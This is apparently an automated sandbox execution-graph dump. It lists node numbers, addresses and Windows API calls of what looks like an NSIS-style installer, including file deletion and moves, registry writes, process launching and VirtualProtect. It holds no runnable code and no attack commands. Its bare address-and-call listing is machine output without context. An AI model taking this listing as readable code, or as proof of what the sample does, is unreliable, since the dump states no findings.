                                                                                                                    execution_graph 4163 401941 4164 401943 4163->4164 4169 402c41 4164->4169 4170 402c4d 4169->4170 4215 40640a 4170->4215 4173 401948 4175 405afa 4173->4175 4257 405dc5 4175->4257 4178 405b22 DeleteFileW 4180 401951 4178->4180 4179 405b39 4181 405c64 4179->4181 4271 4063e8 lstrcpynW 4179->4271 4181->4180 4300 40672b FindFirstFileW 4181->4300 4183 405b5f 4184 405b72 4183->4184 4185 405b65 lstrcatW 4183->4185 4272 405d09 lstrlenW 4184->4272 4188 405b78 4185->4188 4189 405b88 lstrcatW 4188->4189 4190 405b7e 4188->4190 4192 405b93 lstrlenW FindFirstFileW 4189->4192 4190->4189 4190->4192 4194 405c59 4192->4194 4213 405bb5 4192->4213 4193 405c82 4303 405cbd lstrlenW CharPrevW 4193->4303 4194->4181 4197 405c3c FindNextFileW 4201 405c52 FindClose 4197->4201 4197->4213 4198 405ab2 5 API calls 4200 405c94 4198->4200 4202 405c98 4200->4202 4203 405cae 4200->4203 4201->4194 4202->4180 4206 405450 24 API calls 4202->4206 4205 405450 24 API calls 4203->4205 4205->4180 4208 405ca5 4206->4208 4207 405afa 60 API calls 4207->4213 4210 4061ae 36 API calls 4208->4210 4209 405450 24 API calls 4209->4197 4211 405cac 4210->4211 4211->4180 4213->4197 4213->4207 4213->4209 4276 4063e8 lstrcpynW 4213->4276 4277 405ab2 4213->4277 4285 405450 4213->4285 4296 4061ae MoveFileExW 4213->4296 4219 406417 4215->4219 4216 406662 4217 402c6e 4216->4217 4248 4063e8 lstrcpynW 4216->4248 4217->4173 4232 40667c 4217->4232 4219->4216 4220 406630 lstrlenW 4219->4220 4223 40640a 10 API calls 4219->4223 4225 406545 GetSystemDirectoryW 4219->4225 4226 406558 GetWindowsDirectoryW 4219->4226 4227 40667c 5 API calls 4219->4227 4228 40640a 10 API calls 4219->4228 4229 4065d3 lstrcatW 4219->4229 4230 40658c SHGetSpecialFolderLocation 4219->4230 4241 4062b6 4219->4241 4246 40632f wsprintfW 4219->4246 4247 4063e8 lstrcpynW 4219->4247 4220->4219 4223->4220 4225->4219 4226->4219 4227->4219 4228->4219 4229->4219 4230->4219 4231 4065a4 SHGetPathFromIDListW CoTaskMemFree 4230->4231 4231->4219 4239 406689 4232->4239 4233 4066ff 4234 406704 CharPrevW 4233->4234 4236 406725 4233->4236 4234->4233 4235 4066f2 CharNextW 4235->4233 4235->4239 4236->4173 4238 4066de CharNextW 4238->4239 4239->4233 4239->4235 4239->4238 4240 4066ed CharNextW 4239->4240 4253 405cea 4239->4253 4240->4235 4249 406255 4241->4249 4244 40631a 4244->4219 4245 4062ea RegQueryValueExW RegCloseKey 4245->4244 4246->4219 4247->4219 4248->4217 4250 406264 4249->4250 4251 406268 4250->4251 4252 40626d RegOpenKeyExW 4250->4252 4251->4244 4251->4245 4252->4251 4254 405cf0 4253->4254 4255 405d06 4254->4255 4256 405cf7 CharNextW 4254->4256 4255->4239 4256->4254 4306 4063e8 lstrcpynW 4257->4306 4259 405dd6 4307 405d68 CharNextW CharNextW 4259->4307 4262 405b1a 4262->4178 4262->4179 4263 40667c 5 API calls 4269 405dec 4263->4269 4264 405e1d lstrlenW 4265 405e28 4264->4265 4264->4269 4267 405cbd 3 API calls 4265->4267 4266 40672b 2 API calls 4266->4269 4268 405e2d GetFileAttributesW 4267->4268 4268->4262 4269->4262 4269->4264 4269->4266 4270 405d09 2 API calls 4269->4270 4270->4264 4271->4183 4273 405d17 4272->4273 4274 405d29 4273->4274 4275 405d1d CharPrevW 4273->4275 4274->4188 4275->4273 4275->4274 4276->4213 4313 405eb9 GetFileAttributesW 4277->4313 4280 405adf 4280->4213 4281 405ad5 DeleteFileW 4283 405adb 4281->4283 4282 405acd RemoveDirectoryW 4282->4283 4283->4280 4284 405aeb SetFileAttributesW 4283->4284 4284->4280 4286 40546b 4285->4286 4295 40550d 4285->4295 4287 405487 lstrlenW 4286->4287 4288 40640a 17 API calls 4286->4288 4289 4054b0 4287->4289 4290 405495 lstrlenW 4287->4290 4288->4287 4291 4054c3 4289->4291 4292 4054b6 SetWindowTextW 4289->4292 4293 4054a7 lstrcatW 4290->4293 4290->4295 4294 4054c9 SendMessageW SendMessageW SendMessageW 4291->4294 4291->4295 4292->4291 4293->4289 4294->4295 4295->4213 4297 4061c2 4296->4297 4299 4061cf 4296->4299 4316 406034 4297->4316 4299->4213 4301 406741 FindClose 4300->4301 4302 405c7e 4300->4302 4301->4302 4302->4180 4302->4193 4304 405c88 4303->4304 4305 405cd9 lstrcatW 4303->4305 4304->4198 4305->4304 4306->4259 4308 405d85 4307->4308 4310 405d97 4307->4310 4309 405d92 CharNextW 4308->4309 4308->4310 4312 405dbb 4309->4312 4311 405cea CharNextW 4310->4311 4310->4312 4311->4310 4312->4262 4312->4263 4314 405abe 4313->4314 4315 405ecb SetFileAttributesW 4313->4315 4314->4280 4314->4281 4314->4282 4315->4314 4317 406064 4316->4317 4318 40608a GetShortPathNameW 4316->4318 4343 405ede GetFileAttributesW CreateFileW 4317->4343 4319 4061a9 4318->4319 4320 40609f 4318->4320 4319->4299 4320->4319 4322 4060a7 wsprintfA 4320->4322 4324 40640a 17 API calls 4322->4324 4323 40606e CloseHandle GetShortPathNameW 4323->4319 4325 406082 4323->4325 4326 4060cf 4324->4326 4325->4318 4325->4319 4344 405ede GetFileAttributesW CreateFileW 4326->4344 4328 4060dc 4328->4319 4329 4060eb GetFileSize GlobalAlloc 4328->4329 4330 4061a2 CloseHandle 4329->4330 4331 40610d 4329->4331 4330->4319 4345 405f61 ReadFile 4331->4345 4336 406140 4338 405e43 4 API calls 4336->4338 4337 40612c lstrcpyA 4339 40614e 4337->4339 4338->4339 4340 406185 SetFilePointer 4339->4340 4352 405f90 WriteFile 4340->4352 4343->4323 4344->4328 4346 405f7f 4345->4346 4346->4330 4347 405e43 lstrlenA 4346->4347 4348 405e84 lstrlenA 4347->4348 4349 405e8c 4348->4349 4350 405e5d lstrcmpiA 4348->4350 4349->4336 4349->4337 4350->4349 4351 405e7b CharNextA 4350->4351 4351->4348 4353 405fae GlobalFree 4352->4353 4353->4330 4354 4015c1 4355 402c41 17 API calls 4354->4355 4356 4015c8 4355->4356 4357 405d68 4 API calls 4356->4357 4362 4015d1 4357->4362 4358 401631 4360 401663 4358->4360 4361 401636 4358->4361 4359 405cea CharNextW 4359->4362 4365 401423 24 API calls 4360->4365 4381 401423 4361->4381 4362->4358 4362->4359 4371 401617 GetFileAttributesW 4362->4371 4373 4059b9 4362->4373 4376 40591f CreateDirectoryW 4362->4376 4385 40599c CreateDirectoryW 4362->4385 4370 40165b 4365->4370 4369 40164a SetCurrentDirectoryW 4369->4370 4371->4362 4388 4067c2 GetModuleHandleA 4373->4388 4377 405970 GetLastError 4376->4377 4378 40596c 4376->4378 4377->4378 4379 40597f SetFileSecurityW 4377->4379 4378->4362 4379->4378 4380 405995 GetLastError 4379->4380 4380->4378 4382 405450 24 API calls 4381->4382 4383 401431 4382->4383 4384 4063e8 lstrcpynW 4383->4384 4384->4369 4386 4059b0 GetLastError 4385->4386 4387 4059ac 4385->4387 4386->4387 4387->4362 4389 4067e8 GetProcAddress 4388->4389 4390 4067de 4388->4390 4392 4059c0 4389->4392 4394 406752 GetSystemDirectoryW 4390->4394 4392->4362 4393 4067e4 4393->4389 4393->4392 4395 406774 wsprintfW LoadLibraryExW 4394->4395 4395->4393 4397 4053c4 4398 4053d4 4397->4398 4399 4053e8 4397->4399 4400 405431 4398->4400 4401 4053da 4398->4401 4402 4053f0 IsWindowVisible 4399->4402 4409 405410 4399->4409 4403 405436 CallWindowProcW 4400->4403 4411 4043ab 4401->4411 4402->4400 4405 4053fd 4402->4405 4406 4053e4 4403->4406 4414 404d1a SendMessageW 4405->4414 4409->4403 4419 404d9a 4409->4419 4412 4043c3 4411->4412 4413 4043b4 SendMessageW 4411->4413 4412->4406 4413->4412 4415 404d79 SendMessageW 4414->4415 4416 404d3d GetMessagePos ScreenToClient SendMessageW 4414->4416 4417 404d71 4415->4417 4416->4417 4418 404d76 4416->4418 4417->4409 4418->4415 4428 4063e8 lstrcpynW 4419->4428 4421 404dad 4429 40632f wsprintfW 4421->4429 4423 404db7 4430 40140b 4423->4430 4427 404dc7 4427->4400 4428->4421 4429->4423 4434 401389 4430->4434 4433 4063e8 lstrcpynW 4433->4427 4436 401390 4434->4436 4435 4013fe 4435->4433 4436->4435 4437 4013cb MulDiv SendMessageW 4436->4437 4437->4436 4882 401e49 4883 402c1f 17 API calls 4882->4883 4884 401e4f 4883->4884 4885 402c1f 17 API calls 4884->4885 4886 401e5b 4885->4886 4887 401e72 EnableWindow 4886->4887 4888 401e67 ShowWindow 4886->4888 4889 402ac5 4887->4889 4888->4889 4890 40264a 4891 402c1f 17 API calls 4890->4891 4892 402659 4891->4892 4893 4026a3 ReadFile 4892->4893 4894 405f61 ReadFile 4892->4894 4895 4026e3 MultiByteToWideChar 4892->4895 4896 402798 4892->4896 4899 40273c 4892->4899 4900 402709 SetFilePointer MultiByteToWideChar 4892->4900 4901 4027a9 4892->4901 4903 402796 4892->4903 4893->4892 4893->4903 4894->4892 4895->4892 4913 40632f wsprintfW 4896->4913 4899->4892 4899->4903 4904 405fbf SetFilePointer 4899->4904 4900->4892 4902 4027ca SetFilePointer 4901->4902 4901->4903 4902->4903 4905 405fdb 4904->4905 4912 405ff3 4904->4912 4906 405f61 ReadFile 4905->4906 4907 405fe7 4906->4907 4908 406024 SetFilePointer 4907->4908 4909 405ffc SetFilePointer 4907->4909 4907->4912 4908->4912 4909->4908 4910 406007 4909->4910 4911 405f90 WriteFile 4910->4911 4911->4912 4912->4899 4913->4903 4914 404dcc GetDlgItem GetDlgItem 4915 404e1e 7 API calls 4914->4915 4922 405037 4914->4922 4916 404ec1 DeleteObject 4915->4916 4917 404eb4 SendMessageW 4915->4917 4918 404eca 4916->4918 4917->4916 4920 404f01 4918->4920 4921 40640a 17 API calls 4918->4921 4919 40511b 4925 4051c7 4919->4925 4931 4053af 4919->4931 4936 405174 SendMessageW 4919->4936 4924 40435f 18 API calls 4920->4924 4926 404ee3 SendMessageW SendMessageW 4921->4926 4922->4919 4923 4050fc 4922->4923 4929 405097 4922->4929 4923->4919 4933 40510d SendMessageW 4923->4933 4930 404f15 4924->4930 4927 4051d1 SendMessageW 4925->4927 4928 4051d9 4925->4928 4926->4918 4927->4928 4939 4051f2 4928->4939 4940 4051eb ImageList_Destroy 4928->4940 4945 405202 4928->4945 4934 404d1a 5 API calls 4929->4934 4935 40435f 18 API calls 4930->4935 4932 4043c6 8 API calls 4931->4932 4938 4053bd 4932->4938 4933->4919 4951 4050a8 4934->4951 4948 404f23 4935->4948 4936->4931 4937 405189 SendMessageW 4936->4937 4942 40519c 4937->4942 4943 4051fb GlobalFree 4939->4943 4939->4945 4940->4939 4941 405371 4941->4931 4946 405383 ShowWindow GetDlgItem ShowWindow 4941->4946 4953 4051ad SendMessageW 4942->4953 4943->4945 4944 404ff8 GetWindowLongW SetWindowLongW 4947 405011 4944->4947 4945->4941 4959 404d9a 4 API calls 4945->4959 4965 40523d 4945->4965 4946->4931 4949 405017 ShowWindow 4947->4949 4950 40502f 4947->4950 4948->4944 4952 404f73 SendMessageW 4948->4952 4954 404ff2 4948->4954 4957 404fc0 SendMessageW 4948->4957 4958 404faf SendMessageW 4948->4958 4969 404394 SendMessageW 4949->4969 4970 404394 SendMessageW 4950->4970 4951->4923 4952->4948 4953->4925 4954->4944 4954->4947 4957->4948 4958->4948 4959->4965 4960 40502a 4960->4931 4961 405347 InvalidateRect 4961->4941 4963 40535d 4961->4963 4962 405281 4962->4961 4967 4052e2 4962->4967 4968 4052f5 SendMessageW SendMessageW 4962->4968 4971 404cd5 4963->4971 4964 40526b SendMessageW 4964->4962 4965->4962 4965->4964 4967->4968 4968->4962 4969->4960 4970->4922 4974 404c0c 4971->4974 4973 404cea 4973->4941 4975 404c25 4974->4975 4976 40640a 17 API calls 4975->4976 4977 404c89 4976->4977 4978 40640a 17 API calls 4977->4978 4979 404c94 4978->4979 4980 40640a 17 API calls 4979->4980 4981 404caa lstrlenW wsprintfW SetDlgItemTextW 4980->4981 4981->4973 5313 4016cc 5314 402c41 17 API calls 5313->5314 5315 4016d2 GetFullPathNameW 5314->5315 5316 4016ec 5315->5316 5322 40170e 5315->5322 5319 40672b 2 API calls 5316->5319 5316->5322 5317 401723 GetShortPathNameW 5318 402ac5 5317->5318 5320 4016fe 5319->5320 5320->5322 5323 4063e8 lstrcpynW 5320->5323 5322->5317 5322->5318 5323->5322 5324 40234e 5325 402c41 17 API calls 5324->5325 5326 40235d 5325->5326 5327 402c41 17 API calls 5326->5327 5328 402366 5327->5328 5329 402c41 17 API calls 5328->5329 5330 402370 GetPrivateProfileStringW 5329->5330 5331 738e1000 5334 738e101b 5331->5334 5341 738e1516 5334->5341 5336 738e1020 5337 738e1027 GlobalAlloc 5336->5337 5338 738e1024 5336->5338 5337->5338 5339 738e153d 3 API calls 5338->5339 5340 738e1019 5339->5340 5343 738e151c 5341->5343 5342 738e1522 5342->5336 5343->5342 5344 738e152e GlobalFree 5343->5344 5344->5336 5345 4044cf lstrlenW 5346 4044f0 WideCharToMultiByte 5345->5346 5347 4044ee 5345->5347 5347->5346 5348 404850 5349 40487c 5348->5349 5350 40488d 5348->5350 5409 405a32 GetDlgItemTextW 5349->5409 5352 404899 GetDlgItem 5350->5352 5353 4048f8 5350->5353 5355 4048ad 5352->5355 5361 40640a 17 API calls 5353->5361 5371 4049dc 5353->5371 5407 404b8b 5353->5407 5354 404887 5356 40667c 5 API calls 5354->5356 5357 4048c1 SetWindowTextW 5355->5357 5359 405d68 4 API calls 5355->5359 5356->5350 5360 40435f 18 API calls 5357->5360 5365 4048b7 5359->5365 5366 4048dd 5360->5366 5367 40496c SHBrowseForFolderW 5361->5367 5362 404a0c 5368 405dc5 18 API calls 5362->5368 5363 4043c6 8 API calls 5364 404b9f 5363->5364 5365->5357 5373 405cbd 3 API calls 5365->5373 5369 40435f 18 API calls 5366->5369 5370 404984 CoTaskMemFree 5367->5370 5367->5371 5372 404a12 5368->5372 5374 4048eb 5369->5374 5375 405cbd 3 API calls 5370->5375 5371->5407 5411 405a32 GetDlgItemTextW 5371->5411 5412 4063e8 lstrcpynW 5372->5412 5373->5357 5410 404394 SendMessageW 5374->5410 5377 404991 5375->5377 5380 4049c8 SetDlgItemTextW 5377->5380 5384 40640a 17 API calls 5377->5384 5379 4048f1 5382 4067c2 5 API calls 5379->5382 5380->5371 5381 404a29 5383 4067c2 5 API calls 5381->5383 5382->5353 5390 404a30 5383->5390 5385 4049b0 lstrcmpiW 5384->5385 5385->5380 5388 4049c1 lstrcatW 5385->5388 5386 404a71 5413 4063e8 lstrcpynW 5386->5413 5388->5380 5389 404a78 5391 405d68 4 API calls 5389->5391 5390->5386 5394 405d09 2 API calls 5390->5394 5396 404ac9 5390->5396 5392 404a7e GetDiskFreeSpaceW 5391->5392 5395 404aa2 MulDiv 5392->5395 5392->5396 5394->5390 5395->5396 5397 404b3a 5396->5397 5399 404cd5 20 API calls 5396->5399 5398 404b5d 5397->5398 5400 40140b 2 API calls 5397->5400 5414 404381 EnableWindow 5398->5414 5401 404b27 5399->5401 5400->5398 5403 404b3c SetDlgItemTextW 5401->5403 5404 404b2c 5401->5404 5403->5397 5406 404c0c 20 API calls 5404->5406 5405 404b79 5405->5407 5415 4047a9 5405->5415 5406->5397 5407->5363 5409->5354 5410->5379 5411->5362 5412->5381 5413->5389 5414->5405 5416 4047b7 5415->5416 5417 4047bc SendMessageW 5415->5417 5416->5417 5417->5407 5418 401b53 5419 402c41 17 API calls 5418->5419 5420 401b5a 5419->5420 5421 402c1f 17 API calls 5420->5421 5422 401b63 wsprintfW 5421->5422 5423 402ac5 5422->5423 5424 401956 5425 402c41 17 API calls 5424->5425 5426 40195d lstrlenW 5425->5426 5427 402592 5426->5427 5435 4014d7 5436 402c1f 17 API calls 5435->5436 5437 4014dd Sleep 5436->5437 5439 402ac5 5437->5439 5440 401f58 5441 402c41 17 API calls 5440->5441 5442 401f5f 5441->5442 5443 40672b 2 API calls 5442->5443 5444 401f65 5443->5444 5445 401f76 5444->5445 5447 40632f wsprintfW 5444->5447 5447->5445 5448 402259 5449 402c41 17 API calls 5448->5449 5450 40225f 5449->5450 5451 402c41 17 API calls 5450->5451 5452 402268 5451->5452 5453 402c41 17 API calls 5452->5453 5454 402271 5453->5454 5455 40672b 2 API calls 5454->5455 5456 40227a 5455->5456 5457 40228b lstrlenW lstrlenW 5456->5457 5458 40227e 5456->5458 5460 405450 24 API calls 5457->5460 5459 405450 24 API calls 5458->5459 5462 402286 5459->5462 5461 4022c9 SHFileOperationW 5460->5461 5461->5458 5461->5462 5301 40175c 5302 402c41 17 API calls 5301->5302 5303 401763 5302->5303 5304 405f0d 2 API calls 5303->5304 5305 40176a 5304->5305 5306 405f0d 2 API calls 5305->5306 5306->5305 5307 738e2993 5308 738e29e3 5307->5308 5309 738e29a3 VirtualProtect 5307->5309 5309->5308 5463 401d5d GetDlgItem GetClientRect 5464 402c41 17 API calls 5463->5464 5465 401d8f LoadImageW SendMessageW 5464->5465 5466 402ac5 5465->5466 5467 401dad DeleteObject 5465->5467 5467->5466 5468 4022dd 5469 4022e4 5468->5469 5471 4022f7 5468->5471 5470 40640a 17 API calls 5469->5470 5472 4022f1 5470->5472 5473 405a4e MessageBoxIndirectW 5472->5473 5473->5471 5474 401563 5475 402a6b 5474->5475 5478 40632f wsprintfW 5475->5478 5477 402a70 5478->5477 4438 4023e4 4439 402c41 17 API calls 4438->4439 4440 4023f6 4439->4440 4441 402c41 17 API calls 4440->4441 4442 402400 4441->4442 4455 402cd1 4442->4455 4444 40288b 4446 402438 4448 402444 4446->4448 4459 402c1f 4446->4459 4447 402c41 17 API calls 4449 40242e lstrlenW 4447->4449 4451 402463 RegSetValueExW 4448->4451 4462 4031d6 4448->4462 4449->4446 4453 402479 RegCloseKey 4451->4453 4453->4444 4456 402cec 4455->4456 4477 406283 4456->4477 4460 40640a 17 API calls 4459->4460 4461 402c34 4460->4461 4461->4448 4463 403201 4462->4463 4464 4031e5 SetFilePointer 4462->4464 4481 4032de GetTickCount 4463->4481 4464->4463 4467 405f61 ReadFile 4468 403221 4467->4468 4469 4032de 42 API calls 4468->4469 4473 40329e 4468->4473 4470 403238 4469->4470 4471 4032a4 ReadFile 4470->4471 4470->4473 4475 403247 4470->4475 4471->4473 4473->4451 4474 405f61 ReadFile 4474->4475 4475->4473 4475->4474 4476 405f90 WriteFile 4475->4476 4476->4475 4478 406292 4477->4478 4479 402410 4478->4479 4480 40629d RegCreateKeyExW 4478->4480 4479->4444 4479->4446 4479->4447 4480->4479 4482 403436 4481->4482 4483 40330c 4481->4483 4485 402e8e 32 API calls 4482->4485 4494 40345d SetFilePointer 4483->4494 4490 403208 4485->4490 4486 403317 SetFilePointer 4492 40333c 4486->4492 4490->4467 4490->4473 4491 405f90 WriteFile 4491->4492 4492->4490 4492->4491 4493 403417 SetFilePointer 4492->4493 4495 403447 4492->4495 4498 406943 4492->4498 4505 402e8e 4492->4505 4493->4482 4494->4486 4496 405f61 ReadFile 4495->4496 4497 40345a 4496->4497 4497->4492 4499 406968 4498->4499 4500 406970 4498->4500 4499->4492 4500->4499 4501 406a00 GlobalAlloc 4500->4501 4502 4069f7 GlobalFree 4500->4502 4503 406a77 GlobalAlloc 4500->4503 4504 406a6e GlobalFree 4500->4504 4501->4499 4501->4500 4502->4501 4503->4499 4503->4500 4504->4503 4506 402eb7 4505->4506 4507 402e9f 4505->4507 4510 402ec7 GetTickCount 4506->4510 4511 402ebf 4506->4511 4508 402ea8 DestroyWindow 4507->4508 4509 402eaf 4507->4509 4508->4509 4509->4492 4510->4509 4513 402ed5 4510->4513 4520 4067fe 4511->4520 4514 402f0a CreateDialogParamW ShowWindow 4513->4514 4515 402edd 4513->4515 4514->4509 4515->4509 4524 402e72 4515->4524 4517 402eeb wsprintfW 4518 405450 24 API calls 4517->4518 4519 402f08 4518->4519 4519->4509 4521 40681b PeekMessageW 4520->4521 4522 406811 DispatchMessageW 4521->4522 4523 40682b 4521->4523 4522->4521 4523->4509 4525 402e81 4524->4525 4526 402e83 MulDiv 4524->4526 4525->4526 4526->4517 5479 4071e5 5482 406976 5479->5482 5480 406a00 GlobalAlloc 5480->5482 5483 4072e1 5480->5483 5481 4069f7 GlobalFree 5481->5480 5482->5480 5482->5481 5482->5482 5482->5483 5484 406a77 GlobalAlloc 5482->5484 5485 406a6e GlobalFree 5482->5485 5484->5482 5484->5483 5485->5484 5486 402868 5487 402c41 17 API calls 5486->5487 5488 40286f FindFirstFileW 5487->5488 5489 402882 5488->5489 5490 402897 5488->5490 5494 40632f wsprintfW 5490->5494 5492 4028a0 5495 4063e8 lstrcpynW 5492->5495 5494->5492 5495->5489 5496 401968 5497 402c1f 17 API calls 5496->5497 5498 40196f 5497->5498 5499 402c1f 17 API calls 5498->5499 5500 40197c 5499->5500 5501 402c41 17 API calls 5500->5501 5502 401993 lstrlenW 5501->5502 5503 4019a4 5502->5503 5507 4019e5 5503->5507 5508 4063e8 lstrcpynW 5503->5508 5505 4019d5 5506 4019da lstrlenW 5505->5506 5505->5507 5506->5507 5508->5505 5509 40166a 5510 402c41 17 API calls 5509->5510 5511 401670 5510->5511 5512 40672b 2 API calls 5511->5512 5513 401676 5512->5513 5011 40176f 5012 402c41 17 API calls 5011->5012 5013 401776 5012->5013 5014 401796 5013->5014 5015 40179e 5013->5015 5051 4063e8 lstrcpynW 5014->5051 5052 4063e8 lstrcpynW 5015->5052 5018 40179c 5022 40667c 5 API calls 5018->5022 5019 4017a9 5020 405cbd 3 API calls 5019->5020 5021 4017af lstrcatW 5020->5021 5021->5018 5039 4017bb 5022->5039 5023 40672b 2 API calls 5023->5039 5024 4017f7 5025 405eb9 2 API calls 5024->5025 5025->5039 5027 4017cd CompareFileTime 5027->5039 5028 40188d 5030 405450 24 API calls 5028->5030 5029 401864 5032 405450 24 API calls 5029->5032 5040 401879 5029->5040 5031 401897 5030->5031 5034 4031d6 44 API calls 5031->5034 5032->5040 5033 4063e8 lstrcpynW 5033->5039 5035 4018aa 5034->5035 5036 4018be SetFileTime 5035->5036 5038 4018d0 CloseHandle 5035->5038 5036->5038 5037 40640a 17 API calls 5037->5039 5038->5040 5041 4018e1 5038->5041 5039->5023 5039->5024 5039->5027 5039->5028 5039->5029 5039->5033 5039->5037 5046 405a4e MessageBoxIndirectW 5039->5046 5050 405ede GetFileAttributesW CreateFileW 5039->5050 5042 4018e6 5041->5042 5043 4018f9 5041->5043 5044 40640a 17 API calls 5042->5044 5045 40640a 17 API calls 5043->5045 5047 4018ee lstrcatW 5044->5047 5048 401901 5045->5048 5046->5039 5047->5048 5049 405a4e MessageBoxIndirectW 5048->5049 5049->5040 5050->5039 5051->5018 5052->5019 5053 4027ef 5054 4027f6 5053->5054 5057 402a70 5053->5057 5055 402c1f 17 API calls 5054->5055 5056 4027fd 5055->5056 5058 40280c SetFilePointer 5056->5058 5058->5057 5059 40281c 5058->5059 5061 40632f wsprintfW 5059->5061 5061->5057 5514 401a72 5515 402c1f 17 API calls 5514->5515 5516 401a7b 5515->5516 5517 402c1f 17 API calls 5516->5517 5518 401a20 5517->5518 5519 406af2 5521 406976 5519->5521 5520 4072e1 5521->5520 5522 406a00 GlobalAlloc 5521->5522 5523 4069f7 GlobalFree 5521->5523 5524 406a77 GlobalAlloc 5521->5524 5525 406a6e GlobalFree 5521->5525 5522->5520 5522->5521 5523->5522 5524->5520 5524->5521 5525->5524 5526 401573 5527 401583 ShowWindow 5526->5527 5528 40158c 5526->5528 5527->5528 5529 402ac5 5528->5529 5530 40159a ShowWindow 5528->5530 5530->5529 5531 401cf3 5532 402c1f 17 API calls 5531->5532 5533 401cf9 IsWindow 5532->5533 5534 401a20 5533->5534 5535 738e103d 5536 738e101b 5 API calls 5535->5536 5537 738e1056 5536->5537 5538 402df3 5539 402e05 SetTimer 5538->5539 5540 402e1e 5538->5540 5539->5540 5541 402e6c 5540->5541 5542 402e72 MulDiv 5540->5542 5543 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 5542->5543 5543->5541 5545 4014f5 SetForegroundWindow 5546 402ac5 5545->5546 5547 402576 5548 402c41 17 API calls 5547->5548 5549 40257d 5548->5549 5552 405ede GetFileAttributesW CreateFileW 5549->5552 5551 402589 5552->5551 5253 401b77 5254 401b84 5253->5254 5255 401bc8 5253->5255 5256 401c0d 5254->5256 5261 401b9b 5254->5261 5257 401bf2 GlobalAlloc 5255->5257 5258 401bcd 5255->5258 5260 40640a 17 API calls 5256->5260 5271 4022f7 5256->5271 5259 40640a 17 API calls 5257->5259 5258->5271 5274 4063e8 lstrcpynW 5258->5274 5259->5256 5264 4022f1 5260->5264 5272 4063e8 lstrcpynW 5261->5272 5267 405a4e MessageBoxIndirectW 5264->5267 5265 401bdf GlobalFree 5265->5271 5266 401baa 5273 4063e8 lstrcpynW 5266->5273 5267->5271 5269 401bb9 5275 4063e8 lstrcpynW 5269->5275 5272->5266 5273->5269 5274->5265 5275->5271 5276 4024f8 5277 402c81 17 API calls 5276->5277 5278 402502 5277->5278 5279 402c1f 17 API calls 5278->5279 5280 40250b 5279->5280 5281 402533 RegEnumValueW 5280->5281 5282 402527 RegEnumKeyW 5280->5282 5285 40288b 5280->5285 5283 40254f RegCloseKey 5281->5283 5284 402548 5281->5284 5282->5283 5283->5285 5284->5283 5287 40167b 5288 402c41 17 API calls 5287->5288 5289 401682 5288->5289 5290 402c41 17 API calls 5289->5290 5291 40168b 5290->5291 5292 402c41 17 API calls 5291->5292 5293 401694 MoveFileW 5292->5293 5294 4016a7 5293->5294 5300 4016a0 5293->5300 5295 40672b 2 API calls 5294->5295 5298 402250 5294->5298 5297 4016b6 5295->5297 5296 401423 24 API calls 5296->5298 5297->5298 5299 4061ae 36 API calls 5297->5299 5299->5300 5300->5296 5560 401e7d 5561 402c41 17 API calls 5560->5561 5562 401e83 5561->5562 5563 402c41 17 API calls 5562->5563 5564 401e8c 5563->5564 5565 402c41 17 API calls 5564->5565 5566 401e95 5565->5566 5567 402c41 17 API calls 5566->5567 5568 401e9e 5567->5568 5569 401423 24 API calls 5568->5569 5570 401ea5 5569->5570 5577 405a14 ShellExecuteExW 5570->5577 5572 401ee7 5574 40288b 5572->5574 5578 406873 WaitForSingleObject 5572->5578 5575 401f01 CloseHandle 5575->5574 5577->5572 5579 40688d 5578->5579 5580 40689f GetExitCodeProcess 5579->5580 5581 4067fe 2 API calls 5579->5581 5580->5575 5582 406894 WaitForSingleObject 5581->5582 5582->5579 5583 4019ff 5584 402c41 17 API calls 5583->5584 5585 401a06 5584->5585 5586 402c41 17 API calls 5585->5586 5587 401a0f 5586->5587 5588 401a16 lstrcmpiW 5587->5588 5589 401a28 lstrcmpW 5587->5589 5590 401a1c 5588->5590 5589->5590 5591 401000 5592 401037 BeginPaint GetClientRect 5591->5592 5593 40100c DefWindowProcW 5591->5593 5595 4010f3 5592->5595 5596 401179 5593->5596 5597 401073 CreateBrushIndirect FillRect DeleteObject 5595->5597 5598 4010fc 5595->5598 5597->5595 5599 401102 CreateFontIndirectW 5598->5599 5600 401167 EndPaint 5598->5600 5599->5600 5601 401112 6 API calls 5599->5601 5600->5596 5601->5600 5602 401503 5603 40150b 5602->5603 5605 40151e 5602->5605 5604 402c1f 17 API calls 5603->5604 5604->5605 4527 402484 4538 402c81 4527->4538 4530 402c41 17 API calls 4531 402497 4530->4531 4532 4024a2 RegQueryValueExW 4531->4532 4533 40288b 4531->4533 4534 4024c2 4532->4534 4535 4024c8 RegCloseKey 4532->4535 4534->4535 4543 40632f wsprintfW 4534->4543 4535->4533 4539 402c41 17 API calls 4538->4539 4540 402c98 4539->4540 4541 406255 RegOpenKeyExW 4540->4541 4542 40248e 4541->4542 4542->4530 4543->4535 5606 402104 5607 402c41 17 API calls 5606->5607 5608 40210b 5607->5608 5609 402c41 17 API calls 5608->5609 5610 402115 5609->5610 5611 402c41 17 API calls 5610->5611 5612 40211f 5611->5612 5613 402c41 17 API calls 5612->5613 5614 402129 5613->5614 5615 402c41 17 API calls 5614->5615 5617 402133 5615->5617 5616 402172 CoCreateInstance 5621 402191 5616->5621 5617->5616 5618 402c41 17 API calls 5617->5618 5618->5616 5619 401423 24 API calls 5620 402250 5619->5620 5621->5619 5621->5620 4787 403e86 4788 403fd9 4787->4788 4789 403e9e 4787->4789 4790 403fea GetDlgItem GetDlgItem 4788->4790 4799 40402a 4788->4799 4789->4788 4791 403eaa 4789->4791 4792 40435f 18 API calls 4790->4792 4794 403eb5 SetWindowPos 4791->4794 4795 403ec8 4791->4795 4798 404014 SetClassLongW 4792->4798 4793 404084 4800 4043ab SendMessageW 4793->4800 4805 403fd4 4793->4805 4794->4795 4796 403ee5 4795->4796 4797 403ecd ShowWindow 4795->4797 4801 403f07 4796->4801 4802 403eed DestroyWindow 4796->4802 4797->4796 4803 40140b 2 API calls 4798->4803 4799->4793 4804 401389 2 API calls 4799->4804 4827 404096 4800->4827 4807 403f0c SetWindowLongW 4801->4807 4808 403f1d 4801->4808 4806 404309 4802->4806 4803->4799 4809 40405c 4804->4809 4806->4805 4815 404319 ShowWindow 4806->4815 4807->4805 4812 403fc6 4808->4812 4813 403f29 GetDlgItem 4808->4813 4809->4793 4814 404060 SendMessageW 4809->4814 4810 40140b 2 API calls 4810->4827 4811 4042ea DestroyWindow EndDialog 4811->4806 4868 4043c6 4812->4868 4816 403f59 4813->4816 4817 403f3c SendMessageW IsWindowEnabled 4813->4817 4814->4805 4815->4805 4820 403f66 4816->4820 4822 403fad SendMessageW 4816->4822 4823 403f79 